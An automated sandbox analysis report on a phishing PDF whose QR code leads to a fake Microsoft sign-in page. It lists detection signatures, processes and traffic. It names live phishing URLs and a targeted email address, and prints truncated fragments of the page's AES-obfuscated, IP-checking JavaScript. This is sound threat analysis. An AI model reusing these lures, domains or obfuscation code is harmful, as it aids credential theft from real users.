Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
scan3762399_arleen@wcctxlaw.com.pdf

Overview

General Information

Sample name:scan3762399_arleen@wcctxlaw.com.pdf
Analysis ID:1554531
MD5:55291e9f9037ee53a9605772fa7a5cf7
SHA1:a0af9b6b729afdf26c31f9e3dffed68896d28ff2
SHA256:33b47fad1df53235b08cf678442a7ef0f87678a4f33212abafee24294fe1c490

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
AI detected landing page (webpage, office document or email)
HTML page contains suspicious javascript code
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Javascript checks online IP of machine
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

Process Tree

  • System is w10x64_ra
  • Acrobat.exe (PID: 6912 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\scan3762399_arleen@wcctxlaw.com.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 5892 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 6496 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2264 --field-trial-handle=1568,i,13921910073305481846,7220663622836480595,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 6684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://secure.adnxs.com/clktrb?id=273568&redir=https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1960,i,12773921235628740071,16150164899164501191,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

barindex
AI detected phishing page
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comLLM: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'pub-ded8309031d344399056bf442a8ef815.r2.dev' does not match the legitimate domain 'microsoft.com'., The domain 'r2.dev' is not associated with Microsoft and appears to be a generic or cloud service domain., The presence of a long, random-looking subdomain 'pub-ded8309031d344399056bf442a8ef815' is suspicious and not typical for Microsoft., The URL does not contain any direct reference to Microsoft, which is unusual for a legitimate Microsoft page. DOM: 1.3.pages.csv
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comLLM: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'pub-ded8309031d344399056bf442a8ef815.r2.dev' does not match the legitimate domain 'microsoft.com'., The domain 'r2.dev' is not associated with Microsoft and appears to be a generic or cloud service domain., The presence of a password input field on a non-Microsoft domain is suspicious., The URL contains a long string of characters which is often used in phishing attempts to obfuscate the true nature of the site. DOM: 1.4.pages.csv
HTML page contains suspicious javascript code
Source: https://emailavailabilitysecure.info/doc74387//#tarleen@wcctxlaw.comHTTP Parser: window.location.href = atob(
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comHTTP Parser: Number of links: 0
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comHTTP Parser: Total embedded image size: 45708
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comHTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M18,11.578v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944.594.594L7.617,11.578Z" fill="#404040"/><path d="M10.944,7.056l.594.594L7.617,11.578H18v.844H7.617l3.9...
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comHTTP Parser: Title: Account sign in does not match URL
Source: https://emailavailabilitysecure.info/doc74387//#tarleen@wcctxlaw.comHTTP Parser: let current_ip = null;function i5ond(plaintext, key) { const keysize = [16, 24, 32]; if (!keysize.includes(key.length)) { throw new error("incorrect aes key length. use a 16, 24, or 32 bytes key."); } // generate a random iv (initialization vector) const iv = cryptojs.lib.wordarray.random(16); // encrypt the plain text using aes with the given key and random iv const encrypted = cryptojs.aes.encrypt(cryptojs.enc.utf8.parse(plaintext), cryptojs.enc.utf8.parse(key), { iv: iv, mode: cryptojs.mode.cbc, padding: cryptojs.pad.pkcs7 }); // combine the iv and ciphertext (iv is necessary for decryption) const encrypteddata = iv.concat(encrypted.ciphertext); // convert the combined data to base64 for easy transmission or storage return cryptojs.enc.base64.stringify(encrypteddata);}let psk = "kiuveb3cyxcn06kp72v+u6yooq/axvi/cei+iawui9bk3a9tdo89rabuecbaayeszbrgppktls0bjvhiwl+aog==";async function zcvhv() { try { const response = await fetch("https:/...
Source: https://emailavailabilitysecure.info/doc74387//#tarleen@wcctxlaw.comHTTP Parser: let usuuid = "kiuveb3cyxcn06kp72v+u6yooq/axvi/cei+iawui9bk3a9tdo89rabuecbaayeszbrgppktls0bjvhiwl+aog=="; let policy = "pxmvmec2r2ugrndvjdt/6gp5msx1bwn4czrd0lm5xy9mvsoya3rymff+cnjdqdxc";let sv = "0"; let sir = "1"; function decstr(encryptedstring, key) { const keysize = [16, 24, 32]; if (!keysize.includes(key.length)) { throw new error("incorrect aes key length. use a 16, 24, or 32 bytes key."); } const encrypteddata = cryptojs.enc.base64.parse(encryptedstring); const iv = cryptojs.lib.wordarray.create(encrypteddata.words.slice(0, 4)); const ciphertext = cryptojs.lib.wordarray.create( encrypteddata.words.slice(4) ); const decrypteddata = cryptojs.aes.decrypt( { ciphertext: ciphertext, }, cryptojs.enc.utf8.par...
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comHTTP Parser: <input type="password" .../> found
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comHTTP Parser: No favicon
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comHTTP Parser: No favicon
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comHTTP Parser: No favicon
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comHTTP Parser: No favicon
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comHTTP Parser: No favicon
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comHTTP Parser: No <meta name="author".. found
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comHTTP Parser: No <meta name="author".. found
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comHTTP Parser: No <meta name="copyright".. found
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49703 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 1MB later: 29MB
Source: global trafficTCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: global trafficDNS traffic detected: DNS query: secure.adnxs.com
Source: global trafficDNS traffic detected: DNS query: pub-ded8309031d344399056bf442a8ef815.r2.dev
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: emailavailabilitysecure.info
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: o365.alnassers.net
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49703 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: classification engineClassification label: mal56.phis.winPDF@34/57@25/212
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.6744
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-12 10-23-08-807.log
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\scan3762399_arleen@wcctxlaw.com.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2264 --field-trial-handle=1568,i,13921910073305481846,7220663622836480595,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://secure.adnxs.com/clktrb?id=273568&redir=https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1960,i,12773921235628740071,16150164899164501191,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding AC148DB0B131CFA25B5A4F900259FB86
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2264 --field-trial-handle=1568,i,13921910073305481846,7220663622836480595,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1960,i,12773921235628740071,16150164899164501191,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: scan3762399_arleen@wcctxlaw.com.pdfInitial sample: PDF keyword /JS count = 0
Source: scan3762399_arleen@wcctxlaw.com.pdfInitial sample: PDF keyword /JavaScript count = 0
Source: scan3762399_arleen@wcctxlaw.com.pdfInitial sample: PDF keyword /EmbeddedFile count = 0

Persistence and Installation Behavior

barindex
AI detected landing page (webpage, office document or email)
Source: PDF documentLLM: PDF document contains QR code
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comLLM: Page contains button: 'VIEW DOCUMENT' Source: '1.0.pages.csv'
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformation

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid AccountsWindows Management Instrumentation1
Browser Extensions		1
Process Injection		1
Masquerading		OS Credential Dumping1
Process Discovery		Remote ServicesData from Local System2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting		1
Registry Run Keys / Startup Folder		1
Process Injection		LSASS Memory1
System Information Discovery		Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Registry Run Keys / Startup Folder		1
Extra Window Memory Injection		1
Deobfuscate/Decode Files or Information		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Extra Window Memory Injection		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    		high
    code.jquery.com
    		151.101.194.137
    		truefalse
      		high
      cdnjs.cloudflare.com
      		104.17.25.14
      		truefalse
        		high
        www.google.com
